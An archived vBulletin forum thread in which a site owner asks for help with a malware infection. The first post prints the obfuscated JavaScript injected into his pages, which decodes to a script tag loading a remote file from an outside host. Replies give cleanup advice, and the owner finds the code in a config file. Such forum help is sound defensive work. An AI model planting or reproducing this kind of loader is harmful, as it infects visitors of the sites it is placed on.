Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 Programming Discussions
Reload this Page Hacked Site. Please help!
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #1  
Old 05-04-2010, 11:30 AM
ryancooper ryancooper is offline
 
Join Date: Jul 2002
Posts: 433
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Hacked Site. Please help!
Hello,
I am hoping someone can help me out here. MY site is being reported as being infected with malware. If i look at the source code I can see

http://www.talkdisney.com/forums/wdw-theme-parks/

<script type="text/javascript">
var RSrAHsQFTSZ = "GXlLD17GXlLD29"; var rTOwsCKOsBB0 = "GXlLD3cGXlLD73GXlLD"; var rTOwsCKOsBB1 = "63GXlLD72GXlLD69GXl"; var rTOwsCKOsBB2 = "LD70GXlLD74GXlLD20G"; var rTOwsCKOsBB3 = "XlLD73GXlLD72GXlLD6"; var rTOwsCKOsBB4 = "3GXlLD3dGXlLD22GXlL"; var rTOwsCKOsBB5 = "D68GXlLD74GXlLD74GX"; var rTOwsCKOsBB6 = "lLD70GXlLD3aGXlLD2f"; var rTOwsCKOsBB7 = "GXlLD2fGXlLD78GXlLD"; var rTOwsCKOsBB8 = "74GXlLD6fGXlLD70GXl"; var rTOwsCKOsBB9 = "LD2eGXlLD73GXlLD65G"; var rTOwsCKOsBB10 = "XlLD72GXlLD76GXlLD6"; var rTOwsCKOsBB11 = "5GXlLD70GXlLD69GXlL"; var rTOwsCKOsBB12 = "D63GXlLD73GXlLD2eGX"; var rTOwsCKOsBB13 = "lLD63GXlLD6fGXlLD6d"; var rTOwsCKOsBB14 = "GXlLD2fGXlLD2fGXlLD"; var rTOwsCKOsBB15 = "6dGXlLD6cGXlLD2eGXl"; var rTOwsCKOsBB16 = "LD70GXlLD68GXlLD70G"; var rTOwsCKOsBB17 = "XlLD22GXlLD3eGXlLD2"; var rTOwsCKOsBB18 = "0GXlLD3cGXlLD2fGXlL"; var rTOwsCKOsBB19 = "D73GXlLD63GXlLD72GX"; var rTOwsCKOsBB20 = "lLD69GXlLD70GXlLD74"; var rTOwsCKOsBB21 = "GXlLD3e"; var ZrWBlSVWKBL = "MWp2m17GXlLD29"; var GwA9juVrobG = rTOwsCKOsBB0 + rTOwsCKOsBB1 + rTOwsCKOsBB2 + rTOwsCKOsBB3 + rTOwsCKOsBB4 + rTOwsCKOsBB5 + rTOwsCKOsBB6 + rTOwsCKOsBB7 + rTOwsCKOsBB8 + rTOwsCKOsBB9 + rTOwsCKOsBB10 + rTOwsCKOsBB11 + rTOwsCKOsBB12 + rTOwsCKOsBB13 + rTOwsCKOsBB14 + rTOwsCKOsBB15 + rTOwsCKOsBB16 + rTOwsCKOsBB17 + rTOwsCKOsBB18 + rTOwsCKOsBB19 + rTOwsCKOsBB20 + rTOwsCKOsBB21; var wa79vdAM5Lo = "wqOw517CEXvL29"; tZlMHObzT1T = GwA9juVrobG.replace(/GXlLD/g,"%"); var FwL4HjvTvmP=unescape;var RSrAHsQFTSZ = "CEXvL17MWp2m29"; q9124=this; var Bu91Qzp2Fxa= q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")]; Bu91Qzp2Fxa.write(FwL4HjvTvmP(tZlMHObzT1T));
</script>


But I can not find this in the templates or database to remove it. Any ideas on how to fix this?


After a little more research it also seems to only show up in IE not in firefox?
Thanks,
ryan
Reply With Quote
  #2  
Old 05-04-2010, 07:08 PM
kylek kylek is offline
 
Join Date: Oct 2003
Location: British Columbia, Canada
Posts: 798
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Tried to look at your site but avast popped up a malicious url blocked warning, info might help you, will send it via pm
Reply With Quote
  #3  
Old 05-05-2010, 07:04 AM
ZomgStuff ZomgStuff is offline
 
Join Date: Feb 2007
Posts: 469
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
I had a very similar problem just recently. Do you happen to have MGC chatbox installed?

You should look through your .js files, as that's where I found lots of copies of it.
Reply With Quote
  #4  
Old 05-05-2010, 01:02 PM
ryancooper ryancooper is offline
 
Join Date: Jul 2002
Posts: 433
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
@Kylek thanks for the info in PM Lookign now but so far no luck

@ZomgStuff - What did you look for in the .js files?

Thanks for any help!
Reply With Quote
  #5  
Old 05-05-2010, 05:43 PM
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
Senior Member
  
Join Date: Sep 2008
Location: North Carolina
Posts: 5,844
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Originally Posted by ryancooper View Post
@Kylek thanks for the info in PM Lookign now but so far no luck

@ZomgStuff - What did you look for in the .js files?

Thanks for any help!
If you have a custom mod like a chatbox or any custom mods simply replace all the .js files of that mod w/ a fresh downloaded copy.

AdminCP > Maintenance > Diagnostics > Suspect File Versions

*Now, not all files are "suspect" or "bad" but that will help you track down the files if you are unaware of them all. Be sure to check your .js files as mentioned above and also check your templates for any iframes so search in templates for

Code:
<IFRAME SRC="whatever.html"
Leave the part after the = off so you can find all instances, some of these malicious scripts utilize iframes, there is a currently popular iframe and js baddy for Word Press atm so if you have that installed this could be the aftermath if they hacked your site via an exploit.
Reply With Quote
  #6  
Old 05-05-2010, 05:56 PM
ryancooper ryancooper is offline
 
Join Date: Jul 2002
Posts: 433
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Found it in my vbseo config file. no idea how it got there but its gone now. Thanks for all your help.
Reply With Quote
  #7  
Old 05-05-2010, 07:20 PM
legacy123 legacy123 is offline
 
Join Date: Feb 2010
Posts: 72
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
I would definetly secure your files after seeing that
Reply With Quote
Reply

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 07:46 PM.

Contact Us - Archive - Top

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.03676 seconds
  • Memory Usage 2,218KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_code
  • (1)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (7)post_thanks_box
  • (7)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (7)post_thanks_postbit_info
  • (7)postbit
  • (7)postbit_onlinestatus
  • (7)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 
Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete